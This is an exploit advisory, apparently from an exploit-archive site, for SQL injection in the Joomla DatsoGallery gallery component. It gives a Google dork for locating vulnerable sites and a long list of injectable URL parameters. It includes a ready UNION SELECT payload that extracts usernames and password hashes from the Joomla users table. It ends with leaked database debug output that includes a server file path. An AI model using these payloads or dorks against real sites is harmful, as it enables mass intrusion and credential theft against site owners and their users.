#################################################################### # Exploit Title : Joomla DatsoGallery Components 3.4.4 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 14/02/2019 # Vendor Homepage : datso.fr # Software Download Link : datso.fr/products.html # Software Information Link : extensions.joomla.org/extension/datsogallery/ # Software Affected Versions : 3.4.4 and previous versions - 1.3.8 ~ 1.5 ~ 1.14 ~ 1.6 ~ 1.6.2 - 1.7.1 - 1.20 - 1.8.8 - 1.8.4 - 1.8.9 - 1.9.5 # Software Prices : 20$ - 60$ - 120$ - 240$ # Software Technical Requirements : DatsoGallery Multilingual is a native Joomla! and Mambo 4.6.x gallery component DatsoGallery Multilingual is a native Joomla! and Mambo [ No Version ] gallery component # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : High # Google Dorks : inurl:''/index.php?option=com_datsogallery'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # Old Similar CVE => CVE-2008-1540 => nvd.nist.gov/vuln/detail/CVE-2008-1540 # Old Similar CVE => CVE-2008-5208 => cvedetails.com/cve/CVE-2008-5208/ # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** DatsoGallery component help you quickly and effortlessly create a multi-functional photo gallery. The intuitive interface makes it easy to manage the component and its content. A lot of settings allows you to organize the gallery, meet within acceptable to your requirements. It's a powerful image gallery component, which help you quickly and effortlessly create a beautiful and multi-functional photo gallery on your web site. #################################################################### # Impact : *********** Joomla DatsoGallery 3.4.4 and other versions - component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser. #################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_datsogallery&Itemid=[SQL Injection] /index.php?option=com_datsogallery&func=detail&id=[SQL Injection] /index.php?option=com_datsogallery&func=wmark&oid=[SQL Injection] /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=detail&id=[SQL Injection] /index.php?option=com_datsogallery&task=image&catid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=[SQL Injection] /index.php?option=com_datsogallery&func=detail&catid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=&Itemid=[SQL Injection] /index.php?option=com_datsogallery&task=sbox&catid=[ID-NUMBER]&id=[SQL Injection]&format=raw /index.php?option=com_datsogallery&func=slideshow&catid=[ID-NUMBER]&id=[SQL Injection]&format=raw /index.php?option=com_datsogallery&func=special&sorting=lastadd&Itemid=[SQL Injection] /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[SQL Injection] /index.php?option=com_datsogallery&func=download&id=[ID-NUMBER]&Itemid=[SQL Injection] /index.php?option=com_datsogallery&task=downloads&Itemid=[SQL Injection] /index.php?option=com_datsogallery&func=special&sorting=lastadd&Itemid=[SQL Injection] /index.php?option=com_datsogallery&func=lastadded&Itemid=[ID-NUMBER]&limitstart=[SQL Injection] /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[ID-NUMBER]&startpage=[SQL Injection] /index.php?option=com_datsogallery&Itemid=[SQL Injection]&func=special&sorting=lastcomment /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=detail&catid=[ID-NUMBER]&id=[SQL Injection]&lang=hu # Information Disclosure Exploit : ***************************** /administrator/components/com_datsogallery/datsogallery.xml # Example SQL Injection Payload : ******************************* 'union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/* #################################################################### # Example SQL Database Errors : **************************** 30 queries executed 1 SET sql_mode = 'MYSQL40' 2 SELECT folder, element, published, params FROM jos_mambots WHERE published >= 1 AND access <= 0 AND folder = 'system' ORDER BY ordering 3 SELECT template FROM jos_templates_menu WHERE client_id = 0 AND ( menuid = 0 OR menuid = 99999999 ) ORDER BY menuid DESC LIMIT 1 4 DELETE FROM jos_session WHERE ( ( time < '1550015982' ) AND guest = 0 AND gid > 0 ) OR ( ( time < '1550015982' ) AND guest = 1 AND userid = 0 ) 5 SELECT * FROM jos_menu WHERE published = 1 AND link LIKE 'index.php?option=com\_datsogallery%' 6 select a.*, cc.name as category from jos_datsogallery as a, jos_datsogallery_catg as cc where a.catid=cc.cid and a.id=2219 and cc.access<='0' 7 select * from jos_datsogallery_catg where cid=141 and published=1 and access<='0' 8 select * from jos_datsogallery_catg where cid=3 and published=1 and access<='0' 9 select c.access from jos_datsogallery_catg as c left join jos_datsogallery as a on a.catid=c.cid where a.id= '2219' 10 select a.id, a.catid, a.imgtitle, a.imgauthor, a.imgtext, a.imgdate, a.imgcounter, a.imgvotes, a.imgvotesum, a.published, a.imgoriginalname, a.imgfilename, a.imgthumbname, a.owner, u.id FROM jos_datsogallery as a left join jos_users as u on u.username=a.owner where a.id='2219' and a.approved=1 11 select a.id, a.catid, a.imgtitle, a.imgauthor, a.imgtext, a.imgdate, a.imgcounter, a.imgvotes, a.imgvotesum, a.published, a.imgoriginalname, a.imgfilename, a.imgthumbname, a.owner, u.id FROM jos_datsogallery as a left join jos_users as u on u.username=a.owner where a.id='2219' and a.approved=1 12 SELECT id, imgfilename FROM jos_datsogallery WHERE catid=141 ORDER BY id DESC 13 UPDATE jos_datsogallery SET imgcounter='286' WHERE id=2219 14 SELECT a.* FROM jos_components AS a WHERE ( a.admin_menu_link = 'option=com_syndicate' OR a.admin_menu_link = 'option=com_syndicate&hidemainmenu=1' ) AND a.option = 'com_syndicate' 15 SELECT id, title, module, position, content, showtitle, params FROM jos_modules AS m INNER JOIN jos_modules_menu AS mm ON mm.moduleid = m.id WHERE m.published = 1 AND m.access <= 0 AND m.client_id != 1 AND ( mm.menuid = 0 ) ORDER BY ordering 16 SELECT m.* FROM jos_menu AS m WHERE menutype = 'topmenu' AND published = 1 AND access <= 0 AND parent = 0 ORDER BY ordering 17 SELECT m.* FROM jos_menu AS m WHERE menutype = 'mainmenu' AND published = 1 AND access <= 0 ORDER BY parent, ordering 18 SELECT COUNT( id ) FROM jos_menu WHERE type = 'content_item_link' AND published = 1 19 SELECT id FROM jos_menu WHERE type = 'content_item_link' AND published = 1 AND link = 'index.php?option=com_content&task=view&id=1' 20 SELECT id FROM jos_menu WHERE type = 'content_item_link' AND published = 1 AND link = 'index.php?option=com_content&task=view&id=13' 21 SELECT id FROM jos_menu WHERE type = 'content_item_link' AND published = 1 AND link = 'index.php?option=com_content&task=view&id=12' 22 SELECT id FROM jos_menu WHERE type = 'content_item_link' AND published = 1 AND link = 'index.php?option=com_content&task=view&id=14' 23 SELECT id FROM jos_menu WHERE type = 'content_item_link' AND published = 1 AND link = 'index.php?option=com_content&task=view&id=15' 24 SELECT id FROM jos_menu WHERE type = 'content_item_link' AND published = 1 AND link = 'index.php?option=com_content&task=view&id=16' 25 SELECT id FROM jos_menu WHERE type = 'content_item_link' AND published = 1 AND link = 'index.php?option=com_content&task=view&id=17' 26 SELECT id FROM jos_menu WHERE type = 'content_item_link' AND published = 1 AND link = 'index.php?option=com_content&task=view&id=18' 27 SELECT id FROM jos_menu WHERE type = 'content_item_link' AND published = 1 AND link = 'index.php?option=com_content&task=view&id=23' 28 SELECT id FROM jos_menu WHERE type = 'content_item_link' AND published = 1 AND link = 'index.php?option=com_content&task=view&id=38' 29 SELECT id FROM jos_menu WHERE type = 'content_item_link' AND published = 1 AND link = 'index.php?option=com_content&task=view&id=46' 30 SELECT id, name, link, parent, type, menutype, access FROM jos_menu WHERE published = 1 AND access <= 0 ORDER BY menutype, parent, ordering Strict Standards: Non-static method JSite::getMenu() should not be called statically in /home/abusheik/public_html/ds/components /com_datsogallery/datsogallery.php on line 20 #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################